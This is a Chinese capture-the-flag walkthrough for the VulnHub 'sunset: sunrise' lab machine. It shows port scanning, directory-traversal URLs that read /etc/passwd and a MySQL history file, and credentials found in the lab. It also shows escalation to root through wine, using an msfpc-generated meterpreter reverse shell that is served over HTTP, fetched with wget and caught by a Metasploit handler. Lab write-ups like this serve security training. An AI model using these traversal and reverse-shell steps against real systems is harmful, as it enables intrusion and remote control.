仅供个人娱乐
靶机信息
https://www.vulnhub.com/entry/sunset-sunrise,406/
一、主机探测
data:image/s3,"s3://crabby-images/53dc2/53dc2834aa9addfec96bb2d03e025a11426e7782" alt=""
二、信息收集
nmap -sS -sV -T5 -A -p-
data:image/s3,"s3://crabby-images/ec159/ec1596eb8385b8f70d90cb39e296fde12d110ff7" alt=""
data:image/s3,"s3://crabby-images/49093/49093fbd6a295401c0df5d6cdfac506879c2be62" alt=""
http://192.168.174.132:8080/
data:image/s3,"s3://crabby-images/64aea/64aea2c368621218fd2b6de197e1cc65b0d032de" alt=""
data:image/s3,"s3://crabby-images/4b710/4b7105ed691c21d02b229d07a6b597c86954a52e" alt=""
data:image/s3,"s3://crabby-images/5f611/5f6110feab4ad27d566fe98dcc1a5fe2e5f43249" alt=""
data:image/s3,"s3://crabby-images/dcbeb/dcbeb420fcf21f5a6a75d4da28d8b3ef9894f66a" alt=""
三、漏洞利用
构造poc
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
data:image/s3,"s3://crabby-images/f9dbf/f9dbf607ac7a9b71f105403d0746041b0670abbf" alt=""
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2f
data:image/s3,"s3://crabby-images/6ad27/6ad278624c2ffa536c9a3333a615ebf75ca08ac7" alt=""
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
data:image/s3,"s3://crabby-images/1ba16/1ba16ce236a93112e4845126ddb55acb169b0421" alt=""
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
data:image/s3,"s3://crabby-images/14e78/14e789a31d4b3cab2cadd17c739ce23e573ee41a" alt=""
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history
data:image/s3,"s3://crabby-images/afc7b/afc7b7b927f012352464865db8779533391184f5" alt=""
weborf/iheartrainbows44
data:image/s3,"s3://crabby-images/073d8/073d87036225e58a468c5eb2d86623b093bf55bc" alt=""
data:image/s3,"s3://crabby-images/e8afd/e8afd55548183088579263dfe55db6d433e3f98f" alt=""
sunrise thefutureissobrightigottawearshades
root *C7B6683EEB8FF8329D8390574FAA04DD04B87C58
data:image/s3,"s3://crabby-images/28023/280236fd3f0b660015bc61df6e25444d8dc39557" alt=""
data:image/s3,"s3://crabby-images/e9cd2/e9cd2393be59afdd7f5c776903f84a26b240ebe3" alt=""
以root执行wine命令,wine可以执行exe程序
msfpc windows 192.168.174.128
data:image/s3,"s3://crabby-images/8566d/8566d24b4460985da56a29bf5a27e6fd3795fc04" alt=""
python -m SimpleHTTPServer 8888
use exploit/multi/handler
set encoder x86/shikata_ga_nai
set lhost 192.168.174.132
set lport 443
run
wget http://192.168.174.128:8888/windows-meterpreter-staged-reverse-tcp-443.exe
data:image/s3,"s3://crabby-images/077b9/077b9bb3129507895cd741469628be3511ffd001" alt=""